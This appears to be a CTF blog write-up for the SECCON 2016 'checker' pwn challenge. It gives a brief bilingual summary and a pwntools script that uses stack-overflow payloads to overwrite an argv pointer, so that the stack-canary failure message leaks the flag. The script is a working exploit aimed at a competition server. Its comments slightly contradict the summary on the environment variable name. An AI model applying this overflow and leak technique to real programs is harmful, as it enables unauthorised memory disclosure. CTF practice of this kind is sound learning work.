summary: leak flag in memory using argv[1] in stack_check_fail. we need LIBC_FATAL_ERROR environment variable to get stderr from redirected network.
요약: argv[1] 포인터 덮어서, 스택카나리 체크시 flag 를 leak 하기. LIBC_FATAL_ERROR 환경변수 세팅해줘야 stderr 를 볼수있음.
from pwn import *
context.arch = 'amd64' # i386 / arm
# recvuntil sendline, pack, recv, send
r = remote('checker.pwn.seccon.jp', 14726)
#r = process(['./checker'])
raw_input('attach')
# start pwn.
print r.recvuntil('NAME : ')
r.sendline('LIBC_FATAL_STDERR_=1')
print r.recvuntil('>> ')
# overwrite envp[1] to 0x601040
payload = 'A'*(0x188 + 6)
r.sendline(payload)
print r.recvuntil('>> ')
payload = 'A'*(0x188 + 5)
r.sendline(payload)
print r.recvuntil('>> ')
payload = 'A'*(0x188 + 4)
r.sendline(payload)
print r.recvuntil('>> ')
payload = 'A'*(0x188)
payload += pack(0x601040)
r.sendline(payload)
print r.recvuntil('>> ')
payload = 'A'*(0x180 + 7)
r.sendline(payload)
print r.recvuntil('>> ')
payload = 'A'*(0x180 + 6)
r.sendline(payload)
print r.recvuntil('>> ')
payload = 'A'*(0x180 + 5)
r.sendline(payload)
print r.recvuntil('>> ')
payload = 'A'*(0x180 + 4)
r.sendline(payload)
print r.recvuntil('>> ')
payload = 'A'*(0x180)
payload += pack(0x601040)
r.sendline(payload)
print r.recvuntil('>> ')
payload = 'A'*(0x178 + 7)
r.sendline(payload)
print r.recvuntil('>> ')
payload = 'A'*(0x178 + 6)
r.sendline(payload)
print r.recvuntil('>> ')
payload = 'A'*(0x178 + 5)
r.sendline(payload)
print r.recvuntil('>> ')
payload = 'A'*(0x178 + 4)
r.sendline(payload)
print r.recvuntil('>> ')
payload = 'A'*(0x178)
payload += pack(0x6010c0)
r.sendline(payload)
print r.recvuntil('>> ')
r.sendline('yes')
print r.recvuntil('FLAG : ')
raw_input()
r.sendline('fuck')
# get shell?
r.interactive()
'Games > CTF' 카테고리의 다른 글
| DEFCON 2017 awsno writeup (0) | 2017.05.08 |
|---|---|
| SECCON 2016 cheer_msg (0) | 2016.12.12 |
| SECCON 2016 logger (0) | 2016.12.11 |
| SECCON 2016 jumper (0) | 2016.12.11 |
| SECCON 2016 chat (0) | 2016.12.11 |